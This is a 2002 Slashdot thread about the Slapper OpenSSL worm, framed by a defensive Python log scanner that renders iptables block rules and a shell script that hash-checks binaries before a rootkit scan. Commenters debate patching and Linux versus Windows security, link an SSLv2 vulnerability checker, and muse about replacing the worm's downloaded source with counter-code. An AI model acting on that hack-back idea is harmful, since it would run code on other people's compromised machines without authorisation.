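# The only probe signature taken from this page; extend the tuple with whatever
# your own ssl_error_log shows for aborted handshakes (not reproduced here).
PROBE_PATTERNS = (re.compile(r"request without hostname"),)

# Constructed sample input: three rapid hits from one client, a benign error,
# three hits from a second client spread over 15 hours, and one malformed line.
SAMPLE_ERROR_LOG = """\
[Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Thu Sep 12 17:40:11 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Thu Sep 12 17:40:14 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Thu Sep 12 18:02:40 2002] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico
[Thu Sep 12 18:15:00 2002] [error] [client 192.0.2.77] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Fri Sep 13 03:15:00 2002] [error] [client 192.0.2.77] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Fri Sep 13 09:15:00 2002] [error] [client 192.0.2.77] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
this line is not in Apache error_log format and is skipped
""".splitlines()


def parse_error_log(lines):
    """Yield (timestamp, client_ip, message) for well-formed lines; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
        yield ts, m.group("ip"), m.group("msg")


def find_probing_clients(lines, min_hits=3, window_minutes=60):
    """Return {ip: total_probe_hits} for clients with min_hits probe lines inside window_minutes."""
    hits = defaultdict(list)
    for ts, ip, msg in parse_error_log(lines):
        if any(p.search(msg) for p in PROBE_PATTERNS):
            hits[ip].append(ts)
    window = timedelta(minutes=window_minutes)
    flagged = {}
    for ip, stamps in hits.items():
        stamps.sort()
        # Sliding window: flag if any min_hits consecutive stamps fall within the window.
        for i in range(len(stamps) - min_hits + 1):
            if stamps[i + min_hits - 1] - stamps[i] <= window:
                flagged[ip] = len(stamps)
                break
    return flagged


def iptables_rules(flagged, chain="INPUT"):
    """Render per-source DROP rules scoped to tcp/443, leaving HTTPS open to everyone else."""
    return [f"iptables -A {chain} -s {ip} -p tcp --dport 443 -j DROP" for ip in sorted(flagged)]


if __name__ == "__main__":
    suspects = find_probing_clients(SAMPLE_ERROR_LOG)
    for ip, n in suspects.items():
        print(f"{ip}: {n} probe-like hits")
    print("\n".join(iptables_rules(suspects)))
```

Widening the window (for example to a day) also flags the slow repeat client, so tune min_hits and window_minutes to your own traffic before turning the rendered rules into a firewall change.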
It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 5, Insightful
The problem is that many (most? all?) the big-name distros have Apache built with mod_ssl on them. Even though I would guess that only a tiny percent of all web servers need SSL. (Admittedly that tiny percent is very important, as no money transactions should be going on without security...)
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
Re:It's a distro problem, not a linux problem
by
Hard_Code
·
· Score: 2
"IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself."
At some point you have to unless you want to run with a phony snakeoil cert.
Re:It's a distro problem, not a linux problem
by
tialaramex
·
· Score: 2
There's nothing phony about self-certification. Since Verisign and other companies in the CA business don't actually do any useful checks or offer a reliable revocation method, you are just saving everyone involved money. If they /really/ want to be sure you're the real deal they will use out of band methods to verify the fingerprint. Yeah, right.
After all >90% of Windows users went for years without a working CA validation check in their crypto subsystem, so without manually opening and verifying the cert they couldn't tell if it was signed by a real CA anyway.
SSL is provably effective against passive snooping, and has some deterrent value against people with low motivation and minimal resources (e.g. script kiddies) but if you think buying a cheap-ass Verisign cert protects you against black hats then you're just another Voodoo security guy.
Re:It's a distro problem, not a linux problem
by
tshoppa
·
· Score: 2
Why would you not want to encrypt everything is beyond me...
I certainly use it for passwords and anything with any possible financial impact. But I don't see the purpose of doing it for much else.
Maybe it's just a habit I picked up from reading all those crypto books in grade school, but it's well known that the greater the number of intercepts, the easier it'll be for someone to crack a code. Not that I believe those numbers are anything but zero for 128-bit encryption :-)
How to test yourself
by
pbur
·
· Score: 5, Informative
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
http://cert.uni-stuttgart.de/advisories/openssl-sslv2-master/openssl-sslv2-master.c
It will connect to your HTTPS server and check it. Unfortunately, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Ok, /. put an extra space in the URL after "openssl-ss". I will make a link URL:
The Link
Re:How to test yourself
by
jooniqzb1tch
·
· Score: 3, Informative
be sure to check your sendmail as well if you're using TLS, possibly stunnel and any other ssl enabled server you run.. (well it does not check ssh). I had patched apache immediately but this tool made me realise I had forgotten about sendmail :)
Usually it takes at least half an hour to release a patch when a hole is discovered.
This time the patch was a month or so too fast for Slapper.B and C. Does this mean that Open Source gets better and better?
p.s. I hate lame unintuitive virus writers without imagination
-- Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
We're not really catching up
by
Anonymous Coward
·
· Score: 5, Insightful
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Re:We're not really catching up
by
catfood
·
· Score: 5, Insightful
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:We're not really catching up
by
rindeee
·
· Score: 2, Informative
10% of what market you genius? The sector that matters here is machines with direct connection to the Internet. In that sector, Linux outnumbers Windows boxes by a strong (about 3.5 to 1 according to latest Netcraft stats giving Linux/Apache around 60% market share). Methinks an "Introduction to Elementary Statistics" is in order my friend.
Re:We're not really catching up
by
micromoog
·
· Score: 2
Upon reading this outrageously unlikely claim, I did a bit of looking. I assume you're getting your numbers from here.
Apache, unsurprisingly, has a large market share, but no mention of OS . . . you're not assuming all of these Apache servers are running on Linux boxes, are you?
Re:We're not really catching up
by
sehryan
·
· Score: 2
And you know what? A patch was available to MS systems before Code Red starting really moving. I was pushing my administrator to do it. He didn't feel it was necessary. A couple of days later we get hit, and he spends the next days and nights trying to stop the spread and recover.
Code Red exists because of crap MS security. Code Red spread because of crap Administrators.
-- The world moves for love. It kneels before it in awe.
Re:We're not really catching up
by
Dalcius
·
· Score: 2
While the parent of your message was not correct (I don't think?), 27% of all servers today ship with Linux. And that doesn't include those that are being converted from Unix / Windows that were already owned.
10%? *bzzt* Try again.
-- ~Dalcius Rome wasn't burnt in a day.
Re:We're not really catching up
by
micromoog
·
· Score: 2
Show me any legitimate resource that says something remotely close to "60% of all Internet-connected computers run Linux". That was your outrageous claim.
Re:We're not really catching up
by
catfood
·
· Score: 2
Point taken.
But it was the openness of the source that made it possible for someone to do that forcing. It doesn't matter that 99.99% of users didn't notice the bug and didn't go through the source code to find it. What matters is that one hacker did and was able to isolate it because of the availability of source code.
Questions:
by
Black+Parrot
·
· Score: 2, Interesting
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
How many Apache exploits per IIS exploit?
What are the average turnaround times for security updates for Apache and IIS?
How much other stuff gets broken by an Apache update and an IIS update?
being a good samaritan. no www prefix so browsers won't auto link it, no http prefix for same reason. please do not convert to hyperlink. digitalsushi.com/chkrootkit.tar.gz will leave up for 24 hours, or when i just can't take the abuse anymore.
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
Interesting fun fact - almost 45% of you grabbing my mirror are using Windows :D (pssst. you can download from the lunix now, you don't have to download it with the Blue E and then WSFTP it up)
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
To all those who will no doubt post "see, CodeRed can happen to Linux, too" - here is some enlightenment:
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page, around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event. According to news.com, at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, prove two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites. Code Red hit all IIS boxes, Slapper only hits Apache on linux, and even then, it requires the presence of gcc and some other conditions to be met before it works.
That said, I would like to see a more in-depth analysis of the proportions of machines which have been hit and are infected. Also, we should bear in mind that the impact is much less on linux as Apache normally runs as a non-root user while IIS almost always runs as a system/admin user.
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites. Code Red hit all IIS boxes, Slapper only hits Apache on linux, and even then, it requires the presence of gcc and some other conditions to be met before it works.
You say that like it's a bad thing.
But doesn't that speak to the resilience of the Open Source approach? The fact that you can run an Apache site without enabling or even installing SSL is a strength. AFAIK (and ICBW) you can't do that with IIS.
It shows that CodeRed's growth was exponential at the critical time, which measured only a few hours. Days have passed since Slapper hit the 10k mark, and we haven't seen any considerably higher estimates.
Let's just hope Taco isn't doing too much sys admin work these days because this is really old news. Slapper was spotted over a week ago and the news appeared on LWN at the URL below.
My first log entry on my home box (DSL) showing this came up Sep 12... So almost 2 weeks ago.
The entry is as follows: [Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
I've had a total of about 45 hits in the last 2 weeks, not like nimda at all in that regard (had to nuke my error logs like twice a week instead of once a month).
BWP (BTW, I'm running FreeBSD and no SSL so it's not that big a deal for me.)
"Wget"ing its source
by
N+Monkey
·
· Score: 5, Interesting
From the article:
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
Rather than simply having deleted the page, I wonder if it would have been possible to replace this source code with something else that acted as an "antibody"?
Re:"Wget"ing its source
by
bytesmythe
·
· Score: 3, Funny
For maximum benefit, the code should be something like:
ifdown eth0
-- bytesmythe Hypocrisy is the resin that holds the plywood of society together. -- Scott Meyer
New Mac Users Should Take Note, Too
by
Spencerian
·
· Score: 2
For the newbies, remember that Mac OS X is a UNIX family member, too, and comes with Apache as well. The Mac world is so used to getting only one or two attacks over a year that it could be easy to skip over this one.
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vulnerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
-- Vos teneo officium eram periculosus ut vos recipero is.
A false sense of security
by
abhikhurana
·
· Score: 4, Interesting
I think that linux provides the sys admins with a false sense of security. Most sysadmins think that because they are running Linux, they can't be infected with any viruses and worms. The result of this is that many of these administrators never bother to check about new threats, because they haven't seen anything like this for a while. Normally linux administrators are more tech savvy than Windows administrators but as linux GUI improves, one will see a proliferation of not so tech savvy administrators in the Linux market as well. So be prepared for increasing amounts of damage which such worms can cause. On the other hand, the administrators of Windows machines, because they are facing a new worm every second day, try to stay up to date with the latest news and patches. Most of them have automatic update wizards running on their machines which download new patches instantly. In fact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system administrator is too lazy to check a news site, he will still come to know about the threat. And because it will be running on linux, it will do what it's supposed to do, not "God knows What and Gates knows what" as is the case with windows update wizard.
Re:A false sense of security
by
Winterblink
·
· Score: 3, Insightful
You know, I'm with you on this one. I know of friends who decided to jump on the Linux bandwagon, installed the OS and associated daemons and programs, had a fun time customizing their desktop, etc. Never put a single shred of time and effort into looking into any aspects of security. Asking them, the response was, nine times out of ten, "It's Linux man. Security out of the box." or something to that effect. These same people, myself included, when installing Windows head straight to the Control Panel and start deactivating nonessential services as one of the first steps. Subsequently, virus scanners, firewall software (ZoneAlarm, whatever), etc. Hell even my father hits WindowsUpdate and Norton LiveUpdate like it's a religion or something.
Good post man.
-- "I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
Re:A false sense of security
by
sparkz
·
· Score: 2
For Windows Update to work, everything must be installed where MS expects it - if you moved IE to C:\Your Programs\Internet Exploiter\ then Windows Update wouldn't get it.
Similarly, for such a Linux tool to work, it would require that everything is installed in a particular, predictable way; this is how apt-get et al. work.
If you've installed Apache SSL into /usr/webserver/secure/featherything/indian/apache-with-modssl/ then no automatic update facility has a chance of finding it...
The exploit is well known and people are aware of it. It's the same thing that Slapper.A and Slapper.B used.
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
sysadmins?
by
Shadestalker
·
· Score: 4, Insightful
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
Comment removed
by
account_deleted
·
· Score: 4, Interesting
It has been brought to our attention that several posters on this thread have implied that this viral outbreak is in some way connected to the open source community and their users. Slashdot wishes to reiterate their dogmatic belief:
Virus:= Bad
OpenSource:= Good
Microsoft:= Bad
Thus proving that any suggestion of a bug/vulnerability in Linux/Apache is a figment of a deluded imagination and you're most likely Welsh.
He said that operating systems will inherently have security holes.
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
Time to chroot apache
by
Icy
·
· Score: 2, Informative
I don't know why more people don't chroot apache or patch to use chroot(2). It can be a pain at times, but it can't be worse than having to reformat and reinstall the entire OS because you are not sure what was tampered with. I know chroot is not perfect and you can break out of it, but as long as you are careful about what goes in it, you are relatively safe. It would at least keep rootkits away from gcc, which seems to be required for most of these rootkits.
From: Ron DuFresne [mailto:dufresne@winternet.com] Sent: Tuesday, September 24, 2002 9:54 AM To: firewalls@isc.org Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get on the ball and fully patch-up;
September 23 VNUNET.COM. A suspect has been arrested on suspicion of authoring the Slapper worm. But although the threat of the worm seems to have been short-lived, a new variant is already set to take up where its predecessor left off. Although the ISC's 'most attacked ports' chart no longer features Slapper in its Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has several subtle differences, but is for the most part an updated version of its predecessor. Both worms attempt to exploit a known vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants also carry the same payload, a password-protected backdoor and denial of service (DoS) capabilities. ISS's Morgan said that with the new variant on the loose his company had calculated that about 10,000 servers were probably now infected, and that the network was probably going to be used for DoS attacks. He added that it was unlikely the original author created the second worm. "It was significant that source code for the original Slapper was distributed within the computer underground immediately after the worm was detected in the wild," he said. Source: http://www.vnunet.com/News/1135274
-- "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
No, you are actually wrong on that. If you compare the number of IIS servers (they're all windos) and the number of Apache/Linux servers, then Apache/Linux is up front. Even if you double the number to account for people running IIS on their home-desktop, you get nowhere near the "infected-to-unaffected" ratio.
Remember that all the "95% market share" babble is about desktop systems, while both Slapper and CodeRed are targeting server systems, where windos is one among many, and by far not the leader.
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
-- Vintage computer games and RPG books available. Email me if you're interested.
Good point, and true. However, the difference is not an order of magnitude, and as such doesn't matter much. Whether Slapper has 2% or 5% of the CodeRed impact is not an issue. If it had 20% instead of 2%, it would.
You can find figures on SSL servers at netcraft, unfortunately only if you pay for their SSL report.
Slappers.
by
burbledrone
·
· Score: 4, Informative
A linguistic note for Americans and other aliens....
"Slapper" is an EnglishEnglish term for a woman with an easily exploited hole....
On Onions and Carrots
by
Ektanoor
·
· Score: 4, Insightful
Some have been claiming around here that slapper is a "demonstration" that Linux is no better than Windows, maybe worse... Sorry you people but this talk is just about onions and carrots. The fact is that a very similar attack, that happens nearly a year after CodeRed/Nimda carmageddon, shows a huge difference between both worlds.
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note especially the attacks. In less than 12 hours after Nimda's appearance I had more than 340000 Nimda "visits" on the network I supervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Retarded:A few hopes...
by
aphor
·
· Score: 3, Insightful
Let me explain the process. You tell me if the analogy fits.
robber:
You have a serious bug that can compromise a lot of running systems.
OpenSSL:
Oh really?
robber:
I'm serious. Here's how to exploit it, and here's a patch. I demand you fix it.
OpenSSL:
Let me have a look at that... We promise we'll fix it.
robber:
Well, I found it by accident, but it only took me a few hours to write the exploit and the patch. It shouldn't take more than a day or so to get the fix out.
OpenSSL:
We will update our code and send out a patch notice, but it's up to the users to upgrade on their own...
robber:
To give your notice some teeth, I'm going to post the worm to Usenet in 30 days if nobody beats me to it.
{look of utter fear from the thought that someone would say something like that and be serious.}
-- ~ kjrose
Slapper: The threat that wasn't?
by
Andy+Dodd
·
· Score: 2, Insightful
Yes, I'm going to be joining in the crowds of the "Windows still sucks despite this". And here's my reason why:
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
-- retrorocket.o not found, launch anyway?
Re:The most important thing to point out is ...
by
stinky+wizzleteats
·
· Score: 2
Having a patch in a few hours isn't all that impressive - it's nice, but in effect - it's not that useful.
I suppose it's more useful to be subject to the delays of what the commercial sfw industry calls "accepted vulnerability reporting practices" - which means we'll let you and your systems remain vulnerable for months while we:
Do a cost benefit analysis to derive the date at which it is more expensive to us to allow the problem to remain unpatched than to fix it.
Forward the results of the above analysis a schedule for the patch devel group so they can work on a patch.
Coordinate with other devel groups, legal, and marketing to determine what competitive inhibition (breaking Netscape, Novell, Samba, etc.), new DRM measures, EULA changes, and other related stuff should be released with the patch.
people are wary of installing untested patches
I have all of my Linux systems on automatic update, and I've never once had a problem with a patch. I've also never had to accept a new EULA, never had icons I'd previously deleted return to my desktop, nor had third party software suddenly fail to work following a system update.
The difference is not so clear
by
FallLine
·
· Score: 2
Tell me precisely what the difference is, in reality, between the so-called white hats that publish exploit code that allows script kiddies across the world to execute arbitrary code (w/o any modification) on remote machines and the so-called black hat that does the same thing only does not require the same number of script kiddies (because it is self-perpetuating)? Neither necessarily use or commence the attack themselves, but they enable thousands of machines to be hacked just the same. Maybe you can argue that proof of the concept does not require self-perpetuation or the installation of a backdoor (as in the case of the worm), but nor does it require the execution of code that is desirable to the script kiddy (as in the case of many so-called white hat advisories)
I think the idea is that the slapper worm will try to grab something from server X (which it believes to be infected) and it tries to run that. If I replaced what it was expecting with something else, that can't be my fault - an external entity was grabbing code off my servers and executing it, not me.
Re:Slapper: The threat that wasn't?
by
Dionysus
·
· Score: 2, Informative
Not all Apache servers run on Linux. Not all Linux systems run Apache. Not all Linux/w Apache has mod_ssl.
-- Je ne parle pas francais.
If you're an admin...
by
otis+wildflower
·
· Score: 2, Insightful
... and you haven't already patched this months-old hole, hand in your resignation now. There's lots of folks more competent than you who need work.
Re:Source Code?
by
whovian
·
· Score: 3, Informative
one might write a wee proggie to sit on UDP port 2002,
Not good enough, I don't think.
I'm seeing remote ports 2140:2144 being used to attempt to connect to port 443.
So, I'm denying port 443 incoming and monitoring all outgoing unaccounted for udp. (Yes, we were infected.)
-- To-do List: Receive telemarketing call during a tornado warning. Check.
Watch for trojans! Use your own binaries!
by
Wee
·
· Score: 3, Informative
Since chkrootkit normally uses lots of stuff that usually lives in /bin (strings, ps, ls, find, etc), make extra sure that you use the '-p <directory>' flag when you run it. That tells chkrootkit to look for the binaries it needs in that directory instead of wherever they are found in your path. Before you can do this, however, you need to (from a fresh, known-to-be-clean install) either copy all the needed binaries to a CD-R or to a partition re-mounted as read-only. A real paranoid would re-compile static versions of those utils and then use those. YMMV.
It does very little good to check for a rootkit when all the good GNU stuff in /bin has been trojaned...
-B
--
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
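The post above boils down to "trust only tools whose origin you can prove before you run the scanner". As an added example (editor's code, not from the thread and not part of chkrootkit), here is a small POSIX shell script that makes that step mechanical: take SHA-256 digests of the utilities the scanner shells out to from the known-clean copy, keep that baseline off the box, and refuse to proceed if the live copies differ. The tool list, directory layout and the stand-in files in the demo are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not code from the thread or from chkrootkit.
# Idea: before trusting a rootkit scan, confirm that the userland tools the
# scanner shells out to match copies taken from a known-clean install.
# Assumptions: sha256sum (or shasum) is available; CHECKED_TOOLS is a
# hypothetical list you would extend to whatever chkrootkit calls on your box;
# the clean copies sit in a directory you control (read-only mount or CD-R).

CHECKED_TOOLS="ls ps find strings netstat"

# hash_file FILE -> prints the SHA-256 hex digest of FILE
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# build_baseline CLEAN_DIR BASELINE_FILE
# Writes one "digest  toolname" line per tool present in CLEAN_DIR.
build_baseline() {
    clean_dir=$1; out=$2
    : > "$out"
    for t in $CHECKED_TOOLS; do
        [ -f "$clean_dir/$t" ] || continue
        printf '%s  %s\n' "$(hash_file "$clean_dir/$t")" "$t" >> "$out"
    done
}

# verify_against_baseline LIVE_DIR BASELINE_FILE
# Prints MISSING/CHANGED lines for every tool that no longer matches.
# Returns 0 when everything matches, 1 otherwise.
verify_against_baseline() {
    live_dir=$1; base=$2; bad=0
    while read -r digest t; do
        if [ ! -f "$live_dir/$t" ]; then
            echo "MISSING  $live_dir/$t"; bad=1
        elif [ "$(hash_file "$live_dir/$t")" != "$digest" ]; then
            echo "CHANGED  $live_dir/$t"; bad=1
        fi
    done < "$base"
    return $bad
}

# demo_tamper_detection
# Self-contained demonstration on constructed stand-in files (not real
# binaries): snapshot a clean set, replace one copy, and report how many
# tools the verification flags. Prints "1" for the scenario below.
demo_tamper_detection() {
    work=$(mktemp -d)
    mkdir "$work/clean" "$work/live"
    for t in $CHECKED_TOOLS; do
        printf 'stand-in for %s\n' "$t" > "$work/clean/$t"
        cp "$work/clean/$t" "$work/live/$t"
    done
    build_baseline "$work/clean" "$work/baseline.sha256"
    printf 'extra bytes\n' >> "$work/live/ps"      # simulate a replaced ps
    report=$(verify_against_baseline "$work/live" "$work/baseline.sha256" || true)
    rm -rf "$work"
    printf '%s\n' "$report" | grep -c '^CHANGED' || true
}
```

In practice you run build_baseline once against the clean media, store the baseline somewhere the box cannot write to, and run verify_against_baseline right before `chkrootkit -p /path/to/clean/bin`; a CHANGED line for ps or ls means the scan result cannot be trusted no matter what it reports.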
The job of the sysadmin is to stay on top of what is being revealed as vulnerable and then to act appropriately so as to mitigate risk. Updating packages automatically isn't doing that - what if the repository that apt is hitting has been compromised? What if the new version of package X has other issues that make it less than optimal?
One does not approach being secure by putting one's faith in some tool and hoping it solves everything. The only way to lock down a box is to be vigilant and aware, in my experience.
The problem isn't not having packages automatically updated, but rather that there are sysadmins who are militantly unaware of disclosed vulnerabilities in the software they run. Solve the latter and you don't need the (somewhat short-sighted) former.
-- We who were living are now dying
With a little patience
Every time I hear about another buffer overflow, I scratch my head and ask, "Why doesn't anybody use libsafe?" This is a library which, once installed, protects all processes, regardless of whether they have been patched or not.
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
-- Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
Electric Fence in linux (or any other unix platform) will do this for you. It will segfault on any references beyond the end of malloc'ed arrays, use of free()'d memory, etc.
It's very easy to use too -- just link with -lefence or set $LD_PRELOAD to load it.
With it being out for so many years, it's a wonder that people don't make it standard practice to use it!
I'd be interested to see what kind of overhead this checking adds to a server. I'll agree that a slow, secure server is better than a fast, insecure server, but if it is too slow...
Also, I wonder how well this scales up to the enterprise. It may work well for several processes on a single box, but what happens when you distribute those processes to back-end servers. Each box on its own may be fine, but when they intercommunicate, problems could arise.
-- I'd rather you do it wrong, than for me to have to do it at all.
Think Pinto
by
Slipped_Disk
·
· Score: 2, Interesting
For those of you who don't recall, the Pinto was a car with a minor flaw - If you bumped into its ass it tended to explode in a fireball. Ford knew of the problem, and even had a "patch" to fix it (minor design change adding some shielding around the tank if I recall). They chose not to fix the problem because of economics.
The same principle applies to large companies and security patches - If there's no exploit and we don't tell anyone the problem exists, maybe we can get away without investing the time/money (programmers are expen$ive!) in fixing it. Much like Ford, they are gambling that the losses due to the bug/hole/whatever won't be significant enough to hurt their profits long-term.
Software is a business, like any other, and businesses tend to make stupid decisions when they see a way to save a few pennies. They may be wrong (VERY VERY WRONG), but until EVERYONE makes it clear that the "patch it when it gets exploited" mentality hurts their business, the companies will continue doing as they have done.
-- /~mikeg
Re:Slapper: The threat that wasn't?
by
Winterblink
·
· Score: 2
All you've served to point out is that, no matter what platform you choose to run, you should still be diligent in maintaining the security of the system.
No matter how secure Linux claims to be, people should take the perception of default installs being invulnerable out of the box with a huge grain of salt, and give it a good look for anything they can turn off or plug up. The same goes for Windows users, ESPECIALLY for them in my opinion.:) If anything this whole Slapper issue should serve to educate both sides of the Windows vs. Linux debate that security problems exist for everyone no matter what you run.
-- "I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
It's NOT a Linux Worm
by
sjvn
·
· Score: 2, Informative
And, it's not an Apache worm either. It's an OpenSSL worm that exploits security holes in OpenSSL 0.9.6f and earlier.
While the current generation of Slapper targets only OpenSSL on Linux, it will try its attack on any system. And, with a little code tweaking, the next generation of Slapper could hammer on any OS that uses older versions of OpenSSL such as AIX, Solaris, Windows. In short, pretty much any OS that uses OpenSSL is potentially a victim.
Could you have it? If you're a Unix/Linux admin, use chkroot version 0.37 and up to find out. It's available at:
http://www.chkrootkit.org/
In any case, anyone who uses OpenSSL should update with OpenSSL 0.9.6g or higher ASAP. And, while you're at it, be certain to relink everything since OpenSSL isn't used just by Apache. ISC, for example, used it in their BIND 9.1. Slapper wouldn't hit BIND, but would you care to bet that someone couldn't modify the code to launch a BIND attack--and aren't we all really, really sick of BIND getting bungled?
For more on Slapper, and a listing of patches for many operating systems see:
Slapper: The FUD and the Danger http://www.practical-tech.com/network/n09182002.htm
Finally, most of these patches, which would have stopped Slapper dead, were available in late July/early August. Consider it more proof that security is a full time system administrator job.
Steven
All together now: Defense In Depth.
by
CrystalFalcon
·
· Score: 2
While you're right in part about the importance of securing a system, you miss out completely on the importance of defense in depth.
The worst flaw of them all about any security, not just information security, is depending on any one process or action or filter to take care of all attacks. It Won't Work. It Will Fail and when it does, you're hosed. The more defenses in depth you have deployed, the better off you are.
Let me illustrate some of the key design criteria for a modern-day tank (as in main battle tank) to illustrate:
1) Avoid detection.
2) If detected, avoid getting hit.
3) If hit, avoid penetration.
4) If penetrated, minimize damage to equipment and crew.
See what I mean? You have to consider what happens if your defenses fail, and where you would be the most vulnerable, and take additional steps there. Because, you know what? Your defenses will fail. But the more of them you have, the less damage an attacker will be able to do by bringing one down.
(One software company I used to work for would take this to extremes and code X-Files style; "Always assume that the entire world around you has been compromised, that your code is the last piece of code standing! Every data you get, even from within the system, is from somebody who's feeding you bogus or random data, or even lying on purpose to make you fail." But the resulting software had defense in depth.)
